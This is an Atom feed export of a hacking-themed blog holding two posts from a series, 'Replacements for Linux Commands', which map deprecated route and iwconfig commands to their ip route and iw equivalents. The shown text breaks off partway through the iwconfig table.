<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearch/1.1/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0' gd:etag='W/&quot;C0UFQHk9fip7ImA9WhRbEUs.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316</id><updated>2012-02-01T21:40:11.766-08:00</updated><category term='Status messages'/><category term='Steganography'/><category term='TipsAndReviews'/><category term='Win 2K'/><category term='RapidshareLinks'/><category term='PDF Probs'/><category term='eBooks'/><category term='MacOsX Hacks'/><category term='Virus Stuff'/><category term='Errors'/><category term='CPU hacks'/><category term='Keyloggin'/><category term='FireFox Hacks'/><category term='Linux Hacks'/><category term='Mobile Codes'/><category term='a'/><category term='Vulnerabilities'/><category term='Windows7'/><category term='SystemTricks'/><category term='Google Tricks'/><category term='Booting'/><category term='Telnet'/><category term='USB Hacks'/><category term='Mobile Tricks'/><category term='Games'/><category term='domain name server'/><category term='Shorcut'/><category term='Mobile Hacks'/><category term='Serials N Cracks'/><category term='HackTools'/><category term='GPRS-Settings'/><category term='bsnl'/><category term='Bluetooth Hacks'/><category term='News'/><category term='SystemZone'/><category term='facebook'/><category term='Keys'/><category term='Quotes'/><category term='KungFus'/><category term='Nokia'/><category term='Metasploit'/><category term='more'/><category term='Tips'/><category term='Extensions'/><category term='CheatCodes'/><category term='WindowsVista'/><category term='Blogger'/><category term='ideas'/><category term='Web App Hacking'/><category term='Templates'/><category term='Virtualisation'/><category term='Email Hacks'/><category term='Accounts'/><category term='WINXP'/><category term='Registry Tweaks'/><category term='Excel Tips N Tricks'/><category term='concepts'/><category term='FreeLinks'/><category term='FreeStuff'/><category term='Movies'/><category term='Tweaks'/><category term='CoreHacks'/><category term='Windows2k3'/><category term='Stylish Tricks'/><category term='Unix'/><category term='Twitter'/><category term='Commands'/><category term='Win Me'/><category term='Orkut Tricks'/><category term='Hardware Hacks'/><category term='Traffic Boostup'/><category term='Servers Hacking'/><category term='WIFI Hacks'/><category term='trojans'/><category term='Website Hacking'/><category term='Forensics'/><category term='Telecom Hacks'/><category term='hacking'/><category term='Encryption'/><category term='Management'/><category term='Security'/><category term='Net Tricks'/><category term='Tutorials'/><category term='Programming'/><category term='LAN'/><category term='CEH'/><category term='Videos'/><category term='TCP/IP hacks'/><category term='FreeDownloads'/><category term='TrafficBoostup'/><category term='Routers'/><category term='DesktopEnhncements'/><category term='ee'/><category term='RATS'/><category term='taglines'/><category term='d'/><category term='restoring'/><category term='Vista Tips And Tricks'/><category term='Softwares'/><category term='Browser Hacks'/><category term='Lists'/><category term='Memory Problems'/><category term='Reviews'/><category term='hack'/><category term='Cheat Codes'/><category term='Enews'/><category term='Music'/><category term='Netwrking'/><category term='Others'/><category term='Gadgets'/><category term='Mobile Players'/><category term='Frauds'/><category term='VirusCodes'/><category term='Tracing'/><category term='Xp TricksNTips'/><category term='e'/><category term='CiscoHacks'/><category term='Hacking Stuff'/><category term='Adobe Photoshop'/><category term='Yahoo hacks'/><category term='Bios Codes'/><category term='Remote Spying'/><category term='ree'/><category term='Win 98'/><category term='OrkutStuff'/><category term='VPN Issues'/><category term='BloggerWidgets'/><category term='Play with Passwords'/><category term='Exploits'/><category term='LearnOnline'/><category term='HackNews'/><category term='Torrents'/><category term='Password'/><category term='HackingZone'/><title>Hackplanet</title><subtitle type='html'>gr4b y0ur 5p4c3</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default?redirect=false&amp;v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>558</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry gd:etag='W/&quot;Ck4GRH8_cCp7ImA9WhRWE0Q.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-1896498153803184296</id><published>2011-12-31T20:08:00.000-08:00</published><updated>2011-12-31T20:08:45.148-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-12-31T20:08:45.148-08:00</app:edited><title>Replacements for Linux Commands : Part 3</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-3HWAisqnKzA/Tv_cLLfKFII/AAAAAAAABAM/6JqMEZe7P_4/s1600/HNY.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="266" src="http://4.bp.blogspot.com/-3HWAisqnKzA/Tv_cLLfKFII/AAAAAAAABAM/6JqMEZe7P_4/s400/HNY.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h2&gt;

&lt;/h2&gt;
&lt;h2&gt;

&lt;a href="http://www.hackplanet.in/2011/12/replacements-for-linux-commands-part-2.html" target="_blank"&gt;Click Here to go to Previous part : Part 2&lt;/a&gt;&lt;/h2&gt;
&lt;h2&gt;

Route&lt;/h2&gt;
&lt;table border="1" style="width: 680px;"&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;th&gt;&lt;h3&gt;

&lt;strong&gt;Deprecated route commands&lt;br /&gt;
&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;th&gt;&lt;h3&gt;

&lt;strong&gt;Replacement&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Displays the host’s routing tables.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip route&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route -A [family] [add]&lt;/strong&gt; or&lt;strong&gt; route –[family] [add]&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Uses the specified address family with &lt;strong&gt;add&lt;/strong&gt; or &lt;strong&gt;del&lt;/strong&gt;. Valid families are &lt;strong&gt;inet&lt;/strong&gt; (DARPA Internet), &lt;strong&gt;inet6&lt;/strong&gt; (IPv6), &lt;strong&gt;ax25&lt;/strong&gt; (AMPR AX.25), &lt;strong&gt;netrom&lt;/strong&gt; (AMPR NET/ROM), &lt;strong&gt;ipx&lt;/strong&gt; (Novell IPX), &lt;strong&gt;ddp&lt;/strong&gt; (Appletalk DDP), and &lt;strong&gt;x25&lt;/strong&gt; (CCITT X.25).&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip -f [family] route&lt;/strong&gt;&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;strong&gt;[family]&lt;/strong&gt; can be &lt;strong&gt;inet&lt;/strong&gt; (IP), &lt;strong&gt;inet6&lt;/strong&gt; (IPv6), or &lt;strong&gt;link&lt;/strong&gt;. Additionally, &lt;strong&gt;-4&lt;/strong&gt; = &lt;strong&gt;-f inet&lt;/strong&gt; and&lt;strong&gt; -6&lt;/strong&gt; = &lt;strong&gt;-f inet6&lt;/strong&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route -C &lt;/strong&gt;or&lt;strong&gt; –cache&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Operates on the kernel’s routing cache instead of the forwarding information base (FIB) routing table.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent; &lt;strong&gt;ip route show cache&lt;/strong&gt; dumps the routing cache.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route -e &lt;/strong&gt;or&lt;strong&gt; -ee&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Uses the &lt;strong&gt;netstat-r&lt;/strong&gt; format to display the routing table. &lt;strong&gt;-ee&lt;/strong&gt; will generate a very long line with all parameters from the routing table.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip route show&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route -F &lt;/strong&gt;or&lt;strong&gt; –fib&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Operates on the kernel’s Forwarding Information Base (FIB) routing table (default behavior).&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route -h &lt;/strong&gt;or&lt;strong&gt; –help&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Prints the help message.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip route help&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route -n&lt;br /&gt;
&lt;/strong&gt;&lt;span style="color: white;"&gt;.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/span&gt;Shows numerical IP addresses and bypass host name resolution.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route -v &lt;/strong&gt;or&lt;strong&gt; –verbose&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Enables verbose command output.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip -s route&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route -V &lt;/strong&gt;or&lt;strong&gt; –version&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Dispays the version of &lt;strong&gt;net-tools&lt;/strong&gt; and the &lt;strong&gt;route&lt;/strong&gt; command.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip -V&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route add &lt;/strong&gt;or&lt;strong&gt; del&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Adds or delete a route in the routing table.&lt;strong&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip route [add | chg | repl | del] [ip_addr] via [ip_addr]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route [add &lt;/strong&gt;or&lt;strong&gt; del]&lt;/strong&gt; &lt;strong&gt;dev [interface]&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Associates a route with a specific device. If &lt;strong&gt;dev [interface]&lt;/strong&gt; is the last option on the command line, the word dev may be omitted.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip route&amp;nbsp;&lt;/strong&gt;&lt;strong&gt;&lt;strong&gt;[add | chg | repl | del]&lt;/strong&gt; dev [interface]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route [add &lt;/strong&gt;or&lt;strong&gt; del] [default] gw [gw]&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Routes packets through the specified gateway IP address.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip route add default via [gw]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route [add &lt;/strong&gt;or&lt;strong&gt; del] -host&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Specifies that the target is a host (not a network).&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route [add &lt;/strong&gt;or&lt;strong&gt; del] -irtt [I]&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Sets the initial round trip time (IRTT)
 for TCP connections over this route to [I] milliseconds (1-12000). This
 is typically only used on AX.25 networks. If omitted the RFC 1122 default of 300ms is used.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent; &lt;strong&gt;ip route [add | chg | repl | del] rtt [number]&lt;/strong&gt; sets the RTT estimate; &lt;strong&gt;rttvar [number]&lt;/strong&gt; sets the initial RTT variance estimate.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;strong&gt;&lt;strong&gt;route [add &lt;/strong&gt;&lt;/strong&gt;or&lt;strong&gt; del] -net&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Specifies that the target is a network (not a host).&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route [add&lt;/strong&gt; or &lt;strong&gt;del]&lt;/strong&gt; &lt;strong&gt;[-host&lt;/strong&gt; or &lt;strong&gt;-net] netmask [mask]&lt;/strong&gt;&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
Sets the subnet &lt;strong&gt;[mask]&lt;/strong&gt;.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route [add &lt;/strong&gt;or&lt;strong&gt; del] metric [n]&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Sets the metric field in the routing table (used by routing daemons) to the value of &lt;strong&gt;[n]&lt;/strong&gt;.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip route [add | chg | repl | del]&lt;/strong&gt; &lt;strong&gt;metric [number]&lt;/strong&gt; or &lt;strong&gt;preference [number]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route [add &lt;/strong&gt;or&lt;strong&gt; del]&lt;/strong&gt; &lt;strong&gt;mod, dyn, &lt;/strong&gt;or&lt;strong&gt; reinstate&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Install a dynamic or modified route. These flags are for diagnostic purposes, and are generally only set by routing daemons.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route [add &lt;/strong&gt;or&lt;strong&gt; del] mss [bytes]&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Sets the TCP Maximum Segment Size (MSS) for connections over this route to the number of &lt;strong&gt;[bytes]&lt;/strong&gt; specified.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip route [add | chg | repl | del] advmss [number]&lt;/strong&gt; (the MSS to advertise to these destinations when establishing TCP connections).&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;&lt;strong&gt;&lt;strong&gt;&lt;strong&gt;route [add &lt;/strong&gt;&lt;/strong&gt;&lt;/strong&gt;&lt;/strong&gt;or&lt;strong&gt;&lt;strong&gt;&lt;strong&gt;&lt;strong&gt; del] reject&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/strong&gt;&lt;/strong&gt;&lt;/strong&gt;Installs a blocking route, which 
will force a route lookup to fail. This is used to mask out networks 
before using the default route. This is not intended to provide firewall
 functionality.&lt;strong&gt;&lt;strong&gt;&lt;strong&gt;&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/strong&gt;&lt;/strong&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip route add prohibit [network_addr]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route [add &lt;/strong&gt;or&lt;strong&gt; del] window [W]&lt;br /&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/strong&gt;Set the TCP window size for connections over this route to the value of &lt;strong&gt;[W]&lt;/strong&gt; bytes. This is typically only used on AX.25 networks and with drivers unable to handle back-to-back frames.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip route [add | chg | repl | del] window [W]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;span style="color: white;"&gt;.&lt;/span&gt;&lt;br /&gt;
Some examples of &lt;strong&gt;ip route&lt;/strong&gt; command syntax are as follows.&lt;br /&gt;
&lt;strong&gt;&lt;strong&gt;# &lt;/strong&gt;ip route add 10.23.30.0/24 via 192.168.8.50&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;&lt;strong&gt;# &lt;/strong&gt;ip route del 10.28.0.0/16 via 192.168.10.50 dev eth0&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;&lt;strong&gt;#&amp;nbsp;&lt;/strong&gt;ip route chg default via 192.168.25.110 dev eth1&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;# ip route get [ip_address]&lt;/strong&gt; (shows the interface and
 gateway that would be used to reach a remote host. This command would 
be especially useful for troubleshooting routing issues on hosts with 
large routing tables and/or with multiple network interfaces).&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;So here i guess the articles was understanble to you. Sorry for the formatting mistakes, Have fun.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;

&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-1896498153803184296?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/1896498153803184296/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/12/replacements-for-linux-commands.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/1896498153803184296?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/1896498153803184296?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/12/replacements-for-linux-commands.html' title='Replacements for Linux Commands : Part 3'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-3HWAisqnKzA/Tv_cLLfKFII/AAAAAAAABAM/6JqMEZe7P_4/s72-c/HNY.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry gd:etag='W/&quot;Ck4DQnw9eSp7ImA9WhRWE0Q.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-3733182154738330370</id><published>2011-12-31T19:59:00.000-08:00</published><updated>2011-12-31T20:09:33.261-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-12-31T20:09:33.261-08:00</app:edited><title>Replacements for Linux Commands : Part 2</title><content type='html'>&lt;h2&gt;

So moving further with our&lt;a href="http://www.hackplanet.in/2011/12/linux-commands-which-can-be-replaced.html" target="_blank"&gt; FIRST PART&lt;/a&gt; , lets move onwards.&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-6PfosDAruFg/Tv_ZsJGlMMI/AAAAAAAABAA/1MiMGjDz930/s1600/HNY.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="266" src="http://2.bp.blogspot.com/-6PfosDAruFg/Tv_ZsJGlMMI/AAAAAAAABAA/1MiMGjDz930/s400/HNY.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h2&gt;

Iwconfig&lt;/h2&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;
&lt;table border="1" style="width: 680px;"&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;th&gt;&lt;h3&gt;

&lt;strong&gt;Deprecated iwconfig commands&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;th&gt;&lt;h3&gt;

&lt;strong&gt;Replacement&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Displays basic details about wireless interfaces, such as supported protocols (802.11a/b/g/n), Extended Service Set ID (ESSID), mode, and access point. To view these details about a particular interface, use &lt;strong&gt;iwconfig [interface]&lt;/strong&gt; where the interface is the device name, such as &lt;strong&gt;wlan0&lt;/strong&gt;.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;strong&gt;iw dev [interface] link&lt;br /&gt;
&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig [interface] ap [address]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Forces the wireless adapter to register with the access point given by the &lt;strong&gt;[address]&lt;/strong&gt;,
 if possible. This address is the cell identity of the access point (as 
reported by wireless scanning) which may be different from its MAC 
address.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig commit&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Some wireless adapters may not apply changes immediately (they may wait 
to aggregate the changes, or apply them only when the card is brought up
 via &lt;strong&gt;ifconfig&lt;/strong&gt;). This command (when available) forces the adapter to immediately apply all pending changes.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig [interface] essid [name]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Connects to the WLAN with the ESSID &lt;strong&gt;[name]&lt;/strong&gt; provided. With some wireless adapters, you can disable the ESSID checking (ESSID promiscuous) with &lt;strong&gt;off&lt;/strong&gt; or &lt;strong&gt;any&lt;/strong&gt; (and &lt;strong&gt;on&lt;/strong&gt; to re-enable it).&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iw [interface] connect [name]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig [interface] frag [num]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Sets the maximum fragment size which is always lower than the maximum 
packet size. This parameter may also control Frame Bursting available on
 some wireless adapters (the ability to send multiple IP packets 
together). This mechanism would be enabled if the fragment size is 
larger than the maximum packet size. Other valid frag parameters to &lt;strong&gt;auto&lt;/strong&gt;, &lt;strong&gt;on&lt;/strong&gt;, and &lt;strong&gt;off&lt;/strong&gt;.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig [interface] [freq | channel]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Sets the operating frequency or channel on the wireless device. A value 
below 1000 indicates a channel number, a value greater than 1000 is a 
frequency in Hz. You can append the suffix &lt;strong&gt;k&lt;/strong&gt;, &lt;strong&gt;M&lt;/strong&gt; or &lt;strong&gt;G&lt;/strong&gt; to the value (for example, “2.46G” for 2.46 GHz frequency). You may also use&lt;em&gt;&lt;/em&gt; &lt;strong&gt;off&lt;/strong&gt; or &lt;strong&gt;auto&lt;/strong&gt; to let the adapter pick up the best channel (when supported).&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iw dev [interface] set freq [freq] [HT20|HT40+|HT40-]&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;strong&gt;iw dev [interface] set channel [chan] [HT20|HT40+|HT40-]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig [interface] key [key] [mode] [on | off]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
To set the current encryption &lt;strong&gt;[key]&lt;/strong&gt;, just enter the key in &lt;em&gt;hex&lt;/em&gt; digits as XXXX-XXXX-XXXX-XXXX or XXXXXXXX. You can also enter the key as an ASCII string by using the &lt;strong&gt;s: &lt;/strong&gt;prefix. &lt;strong&gt;On&lt;/strong&gt; and &lt;strong&gt;off&lt;/strong&gt; re=enable and disable encryption. The security mode may be &lt;strong&gt;open&lt;/strong&gt; or &lt;strong&gt;restricted&lt;/strong&gt;, and its meaning depends on the card used. With most cards, in &lt;strong&gt;open&lt;/strong&gt; mode no authentication is used and the card may also accept non-encrypted sessions, whereas in &lt;strong&gt;restricted&lt;/strong&gt; mode only encrypted sessions are accepted and the card will use authentication if available.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iw [interface] connect [name] keys [key] &lt;/strong&gt;(for WEP)&lt;br /&gt;
.&lt;br /&gt;
To connect to an AP with WPA or WPA2 encryption, you must use &lt;a href="http://wireless.kernel.org/en/users/Documentation/wpa_supplicant"&gt;wpa_supplicant&lt;/a&gt;.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig [interface] mode [mode]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
